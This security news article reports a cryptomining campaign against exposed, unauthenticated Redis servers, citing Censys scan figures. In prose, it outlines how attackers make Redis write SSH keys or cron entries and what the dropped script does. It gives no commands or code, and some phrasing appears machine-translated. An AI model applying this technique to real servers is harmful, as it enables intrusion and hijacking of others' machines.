Threat actors targeted tens of thousands of unauthenticated Redis servers exposed across the internet as part of a cryptocurrency campaign.
Redis is a popular open-source data structure tool that can be used as a distributed in-memory database, message broker, or cache. The tool is not designed to be exposed on the internet, but researchers have discovered tens of thousands of Redis instances that are publicly accessible without authentication.
Researcher Victor Zhu described a Redis intrusion vulnerability that could be exploited to compromise Redis instances available online.
“Under certain conditions, when Redis is running with the root account (or not even), attackers can write an SSH public key file to the root account and log in to the victim server directly via SSH. This can allow hackers to gain server privileges, wipe or steal data, or even lead to encryption blackmail, critically compromising normal business services,” reads the post published by Zhu on September 11, 2022.
Now, researchers at Censys are warning of tens of thousands of unauthenticated Redis servers being exposed and attacked across the internet.
Threat actors target these instances to install a cryptocurrency miner.
“There are 39,405 unauthenticated Redis services out of a total of 350,675 Redis services on the public internet,” warns Censys. “Nearly 50% of unauthenticated Redis services on the web show signs of a tries Compromise.”
“The general idea behind this exploitation technique is to configure Redis to write its file-based database to a directory that contains some method of authorizing a user (like adding a key to ‘.ssh/authorized_keys’) or a process starts (like adding a script after ‘/etc/cron.d’),” adds Censys.
The experts found evidence demonstrating the ongoing hacking campaign, threat actors attempted to save malicious crontab entries in the /var/spool/cron/root file using multiple Redis keys with the “backup” prefix. The crontab entries allowed the attackers to run a shell script hosted on a remote server.
The shell script is designed to perform the following malicious actions:
- Stops and disables all running security-related processes
- Stops and disables all running system monitoring processes
- Removes and deletes all system and security-related log files, including shell histories (e.g. .bash_history).
- Adds a new SSH key to the root user’s authorized_keys file
- Disables the iptables firewall
- Installs multiple hacking and scanning tools like “masscan”
- Installs and runs the XMRig cryptocurrency mining application
The researchers used a recent list of unauthenticated Redis services running on TCP port 6379 to perform a one-time scan looking for the existence of the “backup1” key on each host. Censys found that of the 31,239 unauthenticated Redis servers in this list, 15,526 hosts had this key set. These instances were attacked by threat actors using the technique described above.
Most of the Redis servers exposed to the internet are located in China (15.29%), followed by Germany (14.11%) and Singapore (12.43%).
“However, that doesn’t mean there are over 15,000 compromised hosts. It is unlikely that each of these hosts will have the conditions required for this vulnerability to be successful. The main reason why many of these attempts fail is that the Redis service needs to be run as a user with the appropriate permissions to write to the /var/spool/cron directory (i.e. root). closes the report. “However, this can be the case when Redis is running in a container (like Docker) where the process sees itself running as root and allows the attacker to write these files. But in this case only the container is affected, not the physical host.”
The report also includes a list of countermeasures for these attacks.
Follow me on Twitter: @Security questions and Facebook
(security matters – chopping, digging)